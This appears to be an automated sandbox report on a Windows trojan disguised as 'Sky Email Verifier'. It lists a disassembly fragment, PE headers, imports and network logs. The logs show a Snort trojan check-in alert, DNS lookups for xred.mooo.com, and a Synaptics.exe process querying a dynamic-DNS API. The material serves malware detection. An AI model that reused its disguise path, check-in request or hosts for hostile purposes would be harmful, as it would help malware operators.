                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007F0604E46D4Eh
                                                                                                                                                                                  add esp, 14h
                                                                                                                                                                                  mov eax, dword ptr [005383BCh]
                                                                                                                                                                                  mov ecx, dword ptr [005383C0h]
                                                                                                                                                                                  mov edx, dword ptr [005383C4h]
                                                                                                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                                                                                                  mov eax, dword ptr [edx]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov eax, dword ptr [ecx]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007F0604E46B2Ch
                                                                                                                                                                                  add esp, 0Ch
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007F0604E46D24h
                                                                                                                                                                                  add esp, 04h
                                                                                                                                                                                  leave
                                                                                                                                                                                  ret
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                  sub esp, 00000004h
                                                                                                                                                                                  nop
                                                                                                                                                                                  mov eax, dword ptr [005383BCh]
                                                                                                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                  mov dword ptr [eax], ecx
                                                                                                                                                                                  mov eax, dword ptr [00000000h]

                                                                                                                                                                                  Data Directories

                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1383600x3c.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x13a0000x34db8.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x13839c0x54.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                  Sections

                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  .text0x10000x6380x800False0.3896484375data4.36493258249IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .rdata0x20000x1365410x136600False0.843532112112data7.87302614152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .bss0x1390000x40x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .rsrc0x13a0000x34db80x34e00False0.209279883274data4.42915798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                  Resources

                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                  RT_ICON0x13a4300x668dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x13aa980x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512EnglishUnited States
                                                                                                                                                                                  RT_ICON0x13ad800x1e8dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x13af680x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                  RT_ICON0x13b0900x35e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                  RT_ICON0x13e6700xea8dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x13f5180x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                  RT_ICON0x13fdc00x6c8dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x1404880x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                  RT_ICON0x1409f00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                  RT_ICON0x1512180x94a8dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x15a6c00x67e8dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x160ea80x5488dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x1663300x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432EnglishUnited States
                                                                                                                                                                                  RT_ICON0x16a5580x25a8dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x16cb000x10a8dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x16dba80x988dataEnglishUnited States
                                                                                                                                                                                  RT_ICON0x16e5300x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                  RT_GROUP_ICON0x16e9980x102dataEnglishUnited States
                                                                                                                                                                                  RT_VERSION0x16eaa00x314dataEnglishUnited States

                                                                                                                                                                                  Imports

                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  msvcrt.dllstrlen, malloc, fopen, fwrite, fclose, memset, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                                                                                                                                                  kernel32.dllCreateProcessA, CloseHandle, SetUnhandledExceptionFilter

                                                                                                                                                                                  Version Infos

                                                                                                                                                                                  DescriptionData
                                                                                                                                                                                  LegalCopyrightwww.skyextractor.com. All rights reserved.
                                                                                                                                                                                  FileVersion7,0,1,4
                                                                                                                                                                                  CompanyNamewww.skyextractor.com
                                                                                                                                                                                  ProductNameSky Email Verifier
                                                                                                                                                                                  ProductVersion7,0,1,4
                                                                                                                                                                                  FileDescriptionSky Email Verifier
                                                                                                                                                                                  FileTitleSky Email Verifier.exe
                                                                                                                                                                                  LegalTrademark
                                                                                                                                                                                  Translation0x0409 0x04b0

                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                  192.168.2.369.42.215.25249739802832617 05/27/22-04:38:15.388403TCP2832617ETPRO TROJAN W32.Bloat-A Checkin4973980192.168.2.369.42.215.252

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  May 27, 2022 04:38:14.467894077 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.467955112 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.468122959 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.496606112 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.496658087 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.496762037 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.624073982 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.624141932 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.624550104 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.624588013 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.684681892 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.684803963 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.685741901 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.685827971 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.686297894 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.686394930 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:14.687249899 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.687339067 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.117405891 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                  May 27, 2022 04:38:15.305057049 CEST804973969.42.215.252192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.305176973 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                  May 27, 2022 04:38:15.369385958 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.369415998 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.369986057 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.370074987 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.387785912 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.388402939 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                  May 27, 2022 04:38:15.397444963 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.397485018 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.398056030 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.398156881 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.399266958 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.428492069 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.440511942 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.577136040 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.577235937 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.577311039 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.577323914 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.577333927 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.577389956 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.580617905 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.580728054 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.580739021 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.580751896 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.580816984 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.580825090 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.603662968 CEST804973969.42.215.252192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.603815079 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                  May 27, 2022 04:38:15.756791115 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.756905079 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.756913900 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.756941080 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.756989002 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.757046938 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.757061958 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.757121086 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.761253119 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.761377096 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.761394024 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:15.761440992 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.068775892 CEST49736443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.068816900 CEST44349736172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.073272943 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.073332071 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.073429108 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.074311018 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.074341059 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.076085091 CEST49737443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.076116085 CEST44349737172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.077316046 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.077373981 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.077459097 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.078001022 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.078027964 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.126924038 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.127032042 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:16.130892992 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:16.131002903 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.074184895 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.074225903 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.075565100 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.075644970 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.457859993 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.457882881 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.535357952 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.535397053 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.648462057 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.648528099 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.648690939 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.648737907 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.648823023 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.648838997 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.650280952 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.650338888 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.650454998 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.650480032 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.824373960 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.824556112 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:17.824604988 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                  May 27, 2022 04:38:17.824656010 CEST44349742172.217.168.14192.168.2.3

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  May 27, 2022 04:38:14.407345057 CEST5742153192.168.2.38.8.8.8
                                                                                                                                                                                  May 27, 2022 04:38:14.432918072 CEST53574218.8.8.8192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:14.756045103 CEST6535853192.168.2.38.8.8.8
                                                                                                                                                                                  May 27, 2022 04:38:14.775238991 CEST53653588.8.8.8192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:15.064286947 CEST4987353192.168.2.38.8.8.8
                                                                                                                                                                                  May 27, 2022 04:38:15.081877947 CEST53498738.8.8.8192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:20.406763077 CEST6526653192.168.2.38.8.8.8
                                                                                                                                                                                  May 27, 2022 04:38:20.426251888 CEST53652668.8.8.8192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:21.686239004 CEST6333253192.168.2.38.8.8.8
                                                                                                                                                                                  May 27, 2022 04:38:21.703108072 CEST53633328.8.8.8192.168.2.3
                                                                                                                                                                                  May 27, 2022 04:38:24.114582062 CEST5139153192.168.2.38.8.8.8
                                                                                                                                                                                  May 27, 2022 04:38:24.133409977 CEST53513918.8.8.8192.168.2.3

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                  May 27, 2022 04:38:14.407345057 CEST192.168.2.38.8.8.80xc6a6Standard query (0)docs.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:14.756045103 CEST192.168.2.38.8.8.80x3c43Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:15.064286947 CEST192.168.2.38.8.8.80x7d91Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:20.406763077 CEST192.168.2.38.8.8.80x1c79Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:21.686239004 CEST192.168.2.38.8.8.80x317cStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:24.114582062 CEST192.168.2.38.8.8.80xae03Standard query (0)xred.mooo.comA (IP address)IN (0x0001)

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                  May 27, 2022 04:38:14.432918072 CEST8.8.8.8192.168.2.30xc6a6No error (0)docs.google.com172.217.168.14A (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:14.775238991 CEST8.8.8.8192.168.2.30x3c43Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:15.081877947 CEST8.8.8.8192.168.2.30x7d91No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:20.426251888 CEST8.8.8.8192.168.2.30x1c79Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:21.703108072 CEST8.8.8.8192.168.2.30x317cName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                  May 27, 2022 04:38:24.133409977 CEST8.8.8.8192.168.2.30xae03Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • docs.google.com
                                                                                                                                                                                  • freedns.afraid.org

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  0192.168.2.349736172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  1192.168.2.349737172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  10192.168.2.349751172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  11192.168.2.349752172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  12192.168.2.349753172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  13192.168.2.349754172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  14192.168.2.349756172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  15192.168.2.349759172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  16192.168.2.349760172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  17192.168.2.349761172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  18192.168.2.349762172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  19192.168.2.349763172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  2192.168.2.349741172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  20192.168.2.349764172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  21192.168.2.349765172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  22192.168.2.349766172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  23192.168.2.349767172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  24192.168.2.349768172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  25192.168.2.349769172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  26192.168.2.349771172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  27192.168.2.349772172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  28192.168.2.349773172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  29192.168.2.349776172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  3192.168.2.349742172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  30192.168.2.349777172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  31192.168.2.34973969.42.215.25280C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  May 27, 2022 04:38:15.388402939 CEST945OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                                  User-Agent: MyApp
                                                                                                                                                                                  Host: freedns.afraid.org
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  May 27, 2022 04:38:15.603662968 CEST950INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:13 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                  Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  4192.168.2.349743172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  5192.168.2.349744172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  6192.168.2.349745172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  7192.168.2.349747172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  8192.168.2.349749172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


